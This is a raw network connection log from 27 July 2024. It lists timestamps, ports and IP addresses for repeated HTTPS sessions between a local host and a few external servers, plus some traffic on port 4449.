Jul 27, 2024 08:55:25.080007076 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.080053091 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.080122948 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.080441952 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.080455065 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.689958096 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.690257072 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.715786934 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.715869904 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.715955973 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.715970039 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.716907978 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:25.718429089 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:25.760580063 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:26.149363041 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:26.149425030 CEST	443	50761	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:26.152017117 CEST	50782	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:26.152096033 CEST	443	50782	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:26.152195930 CEST	50782	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:26.159790039 CEST	50782	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:26.159826040 CEST	443	50782	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:26.642748117 CEST	443	50782	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:26.642999887 CEST	50782	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:27.052274942 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:27.052449942 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:27.052640915 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:27.066497087 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:27.066497087 CEST	50780	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:27.066570044 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:27.066612959 CEST	443	50780	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:27.173548937 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.173584938 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.173635960 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.173942089 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.173959017 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.867580891 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.867666006 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.869839907 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.869860888 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.869905949 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.869911909 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.870486975 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:27.870640039 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:27.912535906 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:28.914468050 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:28.914624929 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:28.914740086 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:28.927429914 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:28.927448988 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:28.927463055 CEST	50783	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:28.927469969 CEST	443	50783	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:29.035036087 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.035116911 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.035198927 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.035516977 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.035552979 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.653059006 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.653259993 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.655019999 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.655073881 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.655131102 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.655143976 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.656100988 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:29.656308889 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:29.696635008 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:30.763792992 CEST	50782	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:30.965696096 CEST	4449	50764	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:30.965775013 CEST	50764	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:31.035561085 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:31.035723925 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:31.035800934 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:31.048567057 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:31.048567057 CEST	50784	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:31.048630953 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:31.048667908 CEST	443	50784	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:31.160079002 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.160156965 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.160252094 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.160590887 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.160623074 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.761307001 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.761396885 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.763580084 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.763606071 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.763665915 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.763675928 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.763947010 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:31.764077902 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:31.804559946 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:33.043864012 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:33.044044971 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:33.044224977 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:33.059309006 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:33.059376955 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:33.059421062 CEST	50785	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:33.059439898 CEST	443	50785	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:33.163316011 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.163343906 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.163405895 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.163754940 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.163762093 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.894779921 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.894851923 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.898494005 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.898499966 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.898550034 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.898552895 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.898595095 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.898597956 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.898819923 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.903722048 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:33.948496103 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:33.981359959 CEST	50764	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:33.981753111 CEST	50787	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:33.986529112 CEST	4449	50764	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:33.986718893 CEST	4449	50787	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:33.986793041 CEST	50787	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:33.987179995 CEST	50787	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:33.992367029 CEST	4449	50787	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:34.884905100 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:34.884977102 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:34.885133028 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:34.898751974 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:34.898772001 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:34.898785114 CEST	50786	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:34.898789883 CEST	443	50786	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:35.005434990 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.005541086 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.005634069 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.006108046 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.006145954 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.637917995 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.638004065 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.640151024 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.640183926 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.640233994 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.640244961 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.640543938 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:35.640676022 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:35.684578896 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:36.954972029 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:36.955136061 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:36.955209970 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:36.969424963 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:36.969472885 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:36.969500065 CEST	50788	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:36.969516039 CEST	443	50788	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:37.083446980 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.083502054 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.083573103 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.083954096 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.083972931 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.673624039 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.673718929 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.675946951 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.675968885 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.676018000 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.676028967 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.677078962 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:37.677247047 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:37.720561981 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:38.984139919 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:38.984302044 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:38.984385967 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:38.999299049 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:38.999335051 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:38.999361992 CEST	50789	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:38.999378920 CEST	443	50789	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:39.114804029 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.114846945 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.115046978 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.115396023 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.115423918 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.795752048 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.795960903 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.797980070 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.798031092 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.798091888 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.798104048 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.799078941 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:39.799345016 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:39.840517998 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:40.780714989 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:40.780797958 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:40.780977964 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:40.795360088 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:40.795361042 CEST	50790	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:40.795423031 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:40.795459986 CEST	443	50790	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:40.896137953 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:40.896214008 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:40.896289110 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:40.899214983 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:40.899249077 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.525621891 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.525716066 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:41.527898073 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:41.527913094 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.527956963 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:41.527961969 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.527997971 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:41.528001070 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.528418064 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:41.528531075 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:41.576539993 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:42.893650055 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:42.894053936 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:42.894237995 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:42.908931017 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:42.908931017 CEST	50791	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:42.908977032 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:42.909002066 CEST	443	50791	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:43.020978928 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.021061897 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.021153927 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.021620989 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.021697044 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.622101068 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.622212887 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.624432087 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.624502897 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.624592066 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.624604940 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.624923944 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:43.625173092 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:43.625252008 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:44.848556042 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:44.848650932 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:44.848843098 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:44.863794088 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:44.863794088 CEST	50792	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:44.863857985 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:44.863893032 CEST	443	50792	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:44.974175930 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:44.974258900 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:44.974339008 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:44.974719048 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:44.974744081 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:45.629184008 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:45.629439116 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:45.631643057 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:45.631695032 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:45.631793976 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:45.631807089 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:45.632116079 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:45.632405996 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:45.632515907 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:46.466710091 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:46.466881037 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:46.466960907 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:46.481301069 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:46.481301069 CEST	50793	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:46.481323957 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:46.481337070 CEST	443	50793	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:46.583687067 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:46.583767891 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:46.583869934 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:46.584230900 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:46.584254026 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:47.192300081 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:47.192507029 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:47.194834948 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:47.194888115 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:47.194952965 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:47.194964886 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:47.195236921 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:47.195643902 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:47.240535021 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:48.563700914 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:48.563872099 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:48.564069033 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:48.579093933 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:48.579093933 CEST	50794	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:48.579158068 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:48.579271078 CEST	443	50794	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:48.693857908 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:48.693938017 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:48.694046974 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:48.694515944 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:48.694591045 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:49.297183037 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:49.297410011 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:49.301688910 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:49.301742077 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:49.301815033 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:49.301827908 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:49.302165031 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:49.302444935 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:49.344558001 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:50.597450018 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:50.597630024 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:50.597807884 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:50.614590883 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:50.614590883 CEST	50795	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:50.614654064 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:50.614691019 CEST	443	50795	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:50.727166891 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:50.727250099 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:50.727490902 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:50.727869987 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:50.727927923 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:51.381872892 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:51.382065058 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:51.384295940 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:51.384349108 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:51.384426117 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:51.384440899 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:51.384828091 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:51.385085106 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:51.432545900 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:52.390760899 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:52.390955925 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:52.391047955 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:52.477377892 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:52.477379084 CEST	50796	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:52.477442026 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:52.477478981 CEST	443	50796	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:52.583492994 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:52.583570004 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:52.583647966 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:52.584033012 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:52.584057093 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:53.200633049 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:53.200721979 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:53.203478098 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:53.203501940 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:53.203562021 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:53.203578949 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:53.203948021 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:53.204108000 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:53.248532057 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:54.520190001 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:54.520297050 CEST	443	50797	107.173.160.137	192.168.2.4
